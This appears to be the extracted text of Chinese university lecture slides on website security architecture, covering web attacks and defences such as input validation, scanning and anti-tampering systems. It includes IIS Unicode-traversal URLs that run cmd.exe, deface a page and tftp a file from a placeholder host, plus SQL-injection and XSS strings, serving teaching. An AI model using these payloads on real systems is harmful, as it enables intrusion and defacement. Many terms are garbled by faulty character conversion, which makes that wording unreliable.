1、網(wǎng)站平安體系架構(gòu)孫建偉北京理工大學(xué)軟件學(xué)院.提綱網(wǎng)站任務(wù)原理網(wǎng)站架構(gòu)網(wǎng)站與閱讀器的交互Web運用攻擊網(wǎng)頁篡改注入式攻擊跨站攻擊Web運用平安體系架構(gòu)分析輸入驗證網(wǎng)站備份恢復(fù)架構(gòu)立體防護體系.Web運用程序的邏輯架構(gòu)三層架構(gòu)(3-tier application) 通常意義上的三層架構(gòu)就是將整個業(yè)務(wù)運用劃分為：表現(xiàn)層UI、業(yè)務(wù)邏輯層BLL、數(shù)據(jù)訪問層DAL。區(qū)分層次的目的即為了“高內(nèi)聚，低耦合的思想。、表現(xiàn)層UI：通俗講就是展現(xiàn)給用戶的界面，即用戶在運用一個系統(tǒng)的時候他的所見所得。、業(yè)務(wù)邏輯層BLL：針對詳細問題的操作，也可以說是對數(shù)據(jù)層的操作，對數(shù)據(jù)業(yè)務(wù)邏輯處置。、數(shù)據(jù)訪問層DAL：該層所做事

2、務(wù)直接操作數(shù)據(jù)庫，針對數(shù)據(jù)的增、刪、改、查。.網(wǎng)站的層次構(gòu)造操作系統(tǒng)：管理計算機平臺資源Web效力器：解析HTTP懇求，處置網(wǎng)頁文件，執(zhí)行動態(tài)腳本網(wǎng)站文件系統(tǒng)靜態(tài)網(wǎng)頁動態(tài)網(wǎng)頁后臺數(shù)據(jù)庫4. HTTP任務(wù)原理因特網(wǎng) 運用此 TCP 銜接閱讀器 程序效力器 程序客戶建立 TCP 銜接釋放 TCP 銜接 呼應(yīng)報文 呼應(yīng)文檔 懇求報文 懇求文檔.(1) 閱讀器分析超鏈指向頁面的 URL。(2) 閱讀器向 DNS 懇求解析 的 IP 地址。(3) 域名系統(tǒng) DNS 解析出清華大學(xué)效力器的 IP 地址。(4) 閱讀器與效力器建立 TCP 銜接(5) 閱讀器發(fā)出取文件命令： GET /chn/yxsz/in

3、dex.htm。(6) 效力器對此懇求給出呼應(yīng)，把文件 index.htm 發(fā)給閱讀器。(7) TCP 銜接釋放。(8) 閱讀器顯示文件 index.htm 中的一切文本。Web訪問任務(wù)原理.Web訪問任務(wù)原理. 閱讀器構(gòu)造與遠地效力器通訊輸出至顯示器從鼠標和鍵盤輸入網(wǎng) 絡(luò) 接 口可選客戶程序HTML解釋程序可選解釋程序控 制 程 序驅(qū)動程序 客戶程序緩 存.9效力器端技術(shù)實現(xiàn)原理Web閱讀器Web效力器HTTP懇求HTTP呼應(yīng)本地磁盤獲取懇求頁1.檢查網(wǎng)頁能否是動態(tài)網(wǎng)頁2.假設(shè)是那么運轉(zhuǎn)其中的效力器端程序3.生成靜態(tài)網(wǎng)頁發(fā)送到客戶端.10網(wǎng)站成為網(wǎng)絡(luò)攻擊的焦點操作系統(tǒng)的復(fù)雜性已公布超越1萬多

4、個系統(tǒng)破綻Web效力器的破綻網(wǎng)站運用破綻網(wǎng)站配置的問題網(wǎng)站系統(tǒng)設(shè)計缺乏平安性架構(gòu)的支持網(wǎng)頁的平安性設(shè)計不夠注入式攻擊多個運用系統(tǒng)不同的開發(fā)者，組織的缺陷 10.Web攻擊事件-篡改網(wǎng)頁11.Web攻擊事件-篡改數(shù)據(jù)12.Web攻擊事件-跨站攻擊13icbc.Web攻擊事件-注入式攻擊14.Web攻擊事件-非法上傳15news.sohu/a.txt.常見Web攻擊類型威脅手段后果注入式攻擊通過構(gòu)造SQL語句對數(shù)據(jù)庫進行非法查詢黑客可以訪問后端數(shù)據(jù)庫，偷竊和修改數(shù)據(jù)跨站腳本攻擊通過受害網(wǎng)站在客戶端顯不正當?shù)膬?nèi)容和執(zhí)行非法命令黑客可以對受害者客戶端進行控制，盜竊用戶信息上傳假冒文件繞過管理員的限制上

5、傳任意類型的文件黑客可以篡改網(wǎng)頁、圖片和下載文件等不安全本地存儲偷竊cookie和session token信息黑客獲取用戶關(guān)鍵資料，冒充用戶身份非法執(zhí)行腳本執(zhí)行系統(tǒng)默認的腳本或自行上傳的WebShell腳本等黑客完全控制服務(wù)器非法執(zhí)行系統(tǒng)命令利用Web服務(wù)器漏洞上執(zhí)行Shell命令Execute等黑客獲得服務(wù)器信息源代碼泄漏利用Web服務(wù)器漏洞或應(yīng)用漏洞獲得腳本源代碼黑客分析源代碼從而更有針對性的對網(wǎng)站攻擊URL訪問限制失效黑客可以訪問非授權(quán)的資源連接黑客可以強行訪問一些登陸網(wǎng)頁、歷史網(wǎng)頁16.攻擊手段例如之一Unicode破綻.破綻選介Unicode破綻微軟的IIS在Unicode字符解碼

6、的實現(xiàn)中存在一個平安破綻，導(dǎo)致用戶可以遠程經(jīng)過IIS執(zhí)行恣意命令可以復(fù)制、刪除、列目錄、系統(tǒng)配置等任何人利用普通閱讀器即可發(fā)起攻擊存在于Windows NT/2000 (IIS4.0/5.0)中2001年初發(fā)現(xiàn)，2001年8月修復(fù)18.破綻原理IIS對特殊字符URL懇求的解碼錯誤%c1%1c - (0 xc1 - 0 xc0) * 0 x40 + 0 x1c = 0 x5c = /%c0%2f - (0 xc0 - 0 xc0) * 0 x40 + 0 x2f = 0 x2f = 構(gòu)造含有特殊字符的URL懇求繞過IIS的途徑檢查可以執(zhí)行或翻開恣意文件19.測試方法測試URLbadou/scri

7、pts/.%u00255c./winnt/system32/cmd.exe?/c+dir+d:badou是恣意一臺未打補丁的 Windows 2000主機的IIS效力器前往結(jié)果目的主機D盤下的文件目錄20.利用破綻列目錄21.利用破綻進展攻擊簡單修正主頁在首頁內(nèi)添加文字“導(dǎo)彈襲擊badou/scripts/.%u00255c./winnt/system32/cmd.exe?/c+echo+導(dǎo)彈襲擊+c:inetpubwwwrootdefault.htm上傳非法頁面用tftp工具將hack.htm上傳到目的主機badou/scripts/. %u00255c./winnt/ system32/c

8、md.exe?/c+tftp -i y.y.y.y GET c:inetpubwwwroothack.htm22.注入式攻擊.注入式攻擊全稱為“SQL注入式攻擊攻擊者利用網(wǎng)站動態(tài)網(wǎng)頁程序設(shè)計上的破綻，在目的的Web效力器上運轉(zhuǎn)SQL命令繞過登錄身份檢查、獲得系統(tǒng)管理員密碼、非法獲取數(shù)據(jù)、非法篡改數(shù)據(jù)、生成非法文件、非法執(zhí)行命令等24.破綻原理攻擊者在表單輸入或者URL懇求中發(fā)送SQL語句片斷，期望經(jīng)過Web運用腳本合成為帶有攻擊目的的SQL語句運用腳本：ASP、JSP、PHP數(shù)據(jù)庫：一切支持SQL的數(shù)據(jù)庫系統(tǒng). SQL注入機理分析數(shù)據(jù)庫運用程序效力器客戶端閱讀器懇求 呼應(yīng) 查詢 結(jié)果集 . S

9、QL注入機理分析續(xù)/構(gòu)建SQL查詢語句 = “SELECT name FROM tbUserInfo WHERE id=(用戶輸入的數(shù)據(jù)) 用戶名：wc or 1=1 -密碼：xxxxSELECT name FROM tbUserInfo WHERE id= wc or 1=1 -. SQL注入攻擊的普經(jīng)過程探測注入點確定數(shù)據(jù)庫類型和版本猜解數(shù)據(jù)庫構(gòu)造確定當前用戶權(quán)限提取信息篡改數(shù)據(jù)發(fā)起高級攻擊運用特定存儲過程遍歷目錄構(gòu)造修正注冊碼. SQL注入攻擊的特點SQL注入是從正常的WWW端口80端口訪問，外表看起來跟普通的web頁面訪問沒什么區(qū)別SQL注入破綻是一個入口，攻擊者經(jīng)過它可以發(fā)動更高級的

10、攻擊，例如控制目的系統(tǒng)。隱蔽性后果嚴重性.運用黑客工具NBSIHDSIDomainX-ScanPangolin30.攻擊手段例如之三跨站攻擊.防跨站攻擊例如運用系統(tǒng)未對閱讀器輸入的參數(shù)進展檢查和處置，直接前往給用戶的閱讀器。Bank請輸入轉(zhuǎn)賬金額：Bank轉(zhuǎn)賬勝利！URL:bank/result.asp?info=轉(zhuǎn)賬勝利!Bank銀行破產(chǎn)！URL:bank/result.asp?info=銀行破產(chǎn)!Xxxs blog:bank宣布破產(chǎn)請點擊官方鏈接10000確定1.正常業(yè)務(wù)2.跨站攻擊.跨站攻擊還能做什么在客戶端執(zhí)行腳本JavaScriptVBScript偷取和仿冒用戶身份和信息cookie

11、session向其他站點提交信息跳轉(zhuǎn)到其他站點33.對策配置和管理配置網(wǎng)絡(luò)和主機編寫平安的運用程序平安掃描模擬浸透工具代碼復(fù)查工具平安防護網(wǎng)頁完好性檢查運用防火墻34.對策一配置和管理.運用程序平安設(shè)計原那么權(quán)限區(qū)域劃分運用最少的特權(quán)運用深化的防御手段不要信任用戶的輸入在網(wǎng)關(guān)處進展檢查出現(xiàn)缺點時的平安性保證最脆弱的鏈接的平安創(chuàng)建平安的默許值減小受攻擊的范圍36.運用程序平安關(guān)注點“如何平安地處置異常？ “如何保證開發(fā)人員任務(wù)站的平安性？ “如何編寫具有最低權(quán)限的代碼？ “如何限制文件 I/O？ “如何防止 SQL 注入？ “如何防止跨站點腳本編寫？ “如何管理？ “如何平安調(diào)用非托管代碼？ “

12、如何執(zhí)行托管代碼的平安復(fù)查？ “如何執(zhí)行平安的輸入驗證？ “如何保證窗體身份驗證的平安性？ 37.防備注入式攻擊檢查用戶輸入關(guān)鍵字過濾強數(shù)據(jù)類型效力器端檢查最小權(quán)限原那么運用存儲過程運用parameters對象控制錯誤信息回顯38.防備跨站攻擊檢查用戶輸入alert(xss)檢查懇求頭中的referer 39.對策二平安掃描.運用平安掃描測試方法黑盒測試浸透和黑客工具白盒測試代碼和開發(fā)生命周期產(chǎn)品AppScan (IBM)WebInspect (HP)N-Stalker (N-Stalker)Acunetix (Acunetix)MatriXay (亞龍安恒,dbappsecurity)Web

13、Ravor (安域領(lǐng)創(chuàng),SecDomain)41.對策三平安防護.運用平安防護網(wǎng)頁防篡改系統(tǒng)維護網(wǎng)頁和腳本的完好性平安容忍類產(chǎn)品iGuard運用防火墻防止針對主機和運用程序的要挾平安防護類產(chǎn)品華誠ImpervaiWall43.網(wǎng)頁防篡改系統(tǒng)設(shè)計思緒網(wǎng)站任務(wù)的流程Web效力器收聽懇求解析url查找url對應(yīng)的網(wǎng)頁文件對于靜態(tài)網(wǎng)頁文件, 發(fā)送給客戶端;對于動態(tài)網(wǎng)頁文件, 效力器端執(zhí)行腳本, 生成頁面文件發(fā)送給客戶端.網(wǎng)頁防篡改系統(tǒng)設(shè)計思緒網(wǎng)站備份恢復(fù)構(gòu)造設(shè)計網(wǎng)站文件備份網(wǎng)站文件在處置前先做完好性校驗經(jīng)過Hook函數(shù)修正web效力器IIS，擴展完好性校驗功能校驗不經(jīng)過，那么從備份系統(tǒng)中恢復(fù)造篡改的文

14、件為加速完好性校驗，采用數(shù)字摘要技術(shù)預(yù)先生成原始文件的摘要數(shù)字水印實時比對.網(wǎng)頁防篡改系統(tǒng)設(shè)計思緒網(wǎng)站備份恢復(fù)構(gòu)造處置流程Web效力器收聽懇求解析url查找url對應(yīng)的網(wǎng)頁文件讀取網(wǎng)頁文件后，做完好性校驗校驗不經(jīng)過，那么從備份中恢復(fù)對于靜態(tài)網(wǎng)頁文件, 發(fā)送給客戶端;對于動態(tài)網(wǎng)頁文件, 效力器端執(zhí)行腳本, 生成頁面文件發(fā)送給客戶端.Web中心內(nèi)嵌模塊47硬件平臺X86/sparc/ItaniumII/PowerPC/PA-RISC操作系統(tǒng)Windows/Linux/FreeBSD/Solaris/AIX/HP-UXWeb效力器軟件(IIS/Apache/Weblogic/Websphere) 平

15、安中心內(nèi)嵌模塊requestresponse運用防護技術(shù)數(shù)字水印技術(shù)Web效力器.防篡改技術(shù)48發(fā)布效力器Web效力器FTP/rsync普通發(fā)布過程篡改檢測模塊自動發(fā)布子系統(tǒng)監(jiān)控和恢復(fù)子系統(tǒng)+篡改檢測子系統(tǒng)SSL1.上傳正常網(wǎng)頁=X水印庫2.閱讀正常網(wǎng)頁3.篡改網(wǎng)頁4.閱讀篡改網(wǎng)頁5.自動恢復(fù)文件系統(tǒng).任務(wù)過程發(fā)布過程發(fā)布內(nèi)嵌模塊檢測到文件創(chuàng)建/變化為文件產(chǎn)生加密和不可逆轉(zhuǎn)數(shù)字水印經(jīng)過加密通道傳送到Web效力器檢測過程公眾發(fā)出懇求閱讀網(wǎng)頁運用防護子系統(tǒng)檢查懇求的合法性頁面維護子系統(tǒng)檢查數(shù)字水印完好性.其它網(wǎng)頁篡改防護的技術(shù)道路外掛輪詢制造網(wǎng)站備份定期抓取網(wǎng)頁與相應(yīng)的備份網(wǎng)頁比對特點:可以是后臺

16、或前臺無法做到實時恢復(fù).其它網(wǎng)頁篡改防護的技術(shù)道路文件維護事件觸發(fā)改造操作系統(tǒng)文件管理功能，監(jiān)控和阻斷文件寫操作只需特權(quán)帳戶才干作寫操作Web效力器帳戶權(quán)限只需讀取權(quán)限特點:權(quán)限管理過于嚴厲限制了web效力器功能，不能順應(yīng)Web2.0技術(shù)的要求.網(wǎng)頁防篡改技術(shù)比較外掛輪詢核心內(nèi)嵌事件觸發(fā)訪問篡改網(wǎng)頁可能不可能可能 動態(tài)網(wǎng)頁防護不支持支持不支持服務(wù)器負載中低極低 帶寬占用中無無 檢測時間分鐘級實時毫秒繞過檢測機制 不可能不可能可能防范連續(xù)篡改不能 支持 不支持斷線時檢測不能能不能 適用操作系統(tǒng)所有所有受限 .Web效力器內(nèi)置的其它防護功能同完好性校驗功能的實現(xiàn)類似，web效力器在構(gòu)造上可以擴展其

17、它防護模塊SQL參數(shù)的校驗處置用戶提交數(shù)據(jù)中惡意腳本的檢查過濾上述處置功能也可以在防火墻平臺上實現(xiàn)不適用于HTTPS方式.防注入攻擊SELECT * FROM userWHERE name=hack or 1=1SELECT * FROM userWHERE name=zhangsanXOWeb效力器軟件運用防護模塊輸入用戶名：zhangsan輸入用戶名：hack or 1 = 1or 1.正常訪問2.注入攻擊.防跨站攻擊例如55Bank請輸入轉(zhuǎn)賬金額：Bank轉(zhuǎn)賬勝利！URL:bank/result.asp?info=轉(zhuǎn)賬勝利!Bank銀行破產(chǎn)！URL:bank/result.asp?inf

18、o=銀行破產(chǎn)!Xxxs blog:bank宣布破產(chǎn)請點擊官方鏈接URL:bank/result.asp?info=?10000確定?X1.正常業(yè)務(wù)2.跨站攻擊3.運用防護.運用防火墻實現(xiàn)方式比較項目軟件實現(xiàn)方式硬件實現(xiàn)方式部署點Web服務(wù)器網(wǎng)關(guān)網(wǎng)絡(luò)配置無須改變須改變訪問性能影響小，無瓶頸效應(yīng)影響大，有瓶頸效應(yīng)單點失效不可能可能升級方便可以細粒度配置方便可以成本一般較高56.關(guān)鍵腳本的平安性設(shè)計對于處置用戶輸入數(shù)據(jù)的網(wǎng)站腳本文件，思索平安性設(shè)計Web腳本軟件的輸入驗證：過濾跨站攻擊腳本、SQL注入攻擊等惡意訪問對于CC攻擊類型惡意訪問，添加辨識和回絕功能.兩種方案的比較兩種輸入驗證方案腳本平安性設(shè)計web效力器內(nèi)嵌模塊腳本平安性設(shè)計.悟道系統(tǒng)功能與構(gòu)造的關(guān)系同樣的功能需求，包括平安功能需求，可以選擇不同的技術(shù)道路，采用不同的構(gòu)造，運用不同的部署方式復(fù)雜的平安功能必然需求一種組合的構(gòu)造.Web運用平安防護體系.傳統(tǒng)網(wǎng)絡(luò)平安設(shè)備防火墻限制地址和端口訪問驗證和加固網(wǎng)絡(luò)協(xié)議入侵檢測基于網(wǎng)絡(luò)層的數(shù)據(jù)包檢查問題Web/80端口誰來維護？運用數(shù)